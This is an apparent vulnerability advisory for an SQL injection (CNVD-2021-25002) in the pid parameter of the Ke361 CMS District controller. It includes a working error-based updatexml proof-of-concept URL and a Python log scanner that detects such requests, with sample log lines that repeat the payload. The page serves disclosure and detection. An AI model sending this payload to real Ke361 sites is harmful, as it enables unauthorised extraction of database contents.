Ke361 DistrictController.class.php Background SQL injection vulnerability CNVD-2021-25002
Vulnerability Description
The index() function in Ke361's DistrictController.class.php has a SQL injection vulnerability in the pid parameter, through which sensitive database information can be obtained.
Vulnerability Impact
Ke361
Environment setup
https://gitee.com/jcove/ke361
Vulnerability reproduction
CMS Product Page
The vulnerable file is Application/Admin/Controller/DistrictController.class.php
Verification PoC
admin.php?s=/District/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+
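
A log check for requests shaped like the one above, as an added example that is not part of the original page or the Ke361 project: it flags any request to District/index whose pid is not a plain integer. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Client address and request target from a combined-format access log entry.
REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# pid segment of the District/index route named in the advisory.
PID_RE = re.compile(r"/District/index/pid/([^/&]*)", re.IGNORECASE)
# Error-based MySQL functions; updatexml is the one used in the page's PoC.
ERROR_FUNCS = re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.IGNORECASE)

def classify(url):
    """Return (verdict, pid) for a request to the route, or None for other URLs."""
    query = unquote_plus(urlsplit(url).query)  # decode %20 and '+' before matching
    m = PID_RE.search(query)
    if m is None:
        return None
    pid = m.group(1)
    if re.fullmatch(r"[0-9]+", pid):
        return ("ok", pid)
    if ERROR_FUNCS.search(pid):
        return ("error-based-sqli", pid)
    return ("non-numeric-pid", pid)

def scan(lines):
    """Return (client, verdict, pid) for every request with a suspicious pid."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        result = classify(m.group(2))
        if result and result[0] != "ok":
            hits.append((m.group(1), *result))
    return hits

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2021:10:00:00 +0000] "GET /admin.php?s=/District/index/pid/1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Apr/2021:10:00:05 +0000] "GET /admin.php?s=/District/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+ HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Apr/2021:10:00:09 +0000] "GET /admin.php?s=/District/index/pid/abc HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Apr/2021:10:00:12 +0000] "GET /admin.php?s=/Index/index HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for client, verdict, pid in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{pid!r}")
```

The same integer-only rule is what the controller itself should enforce on pid before the value reaches a query.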
This post is licensed under CC BY 4.0 by the author.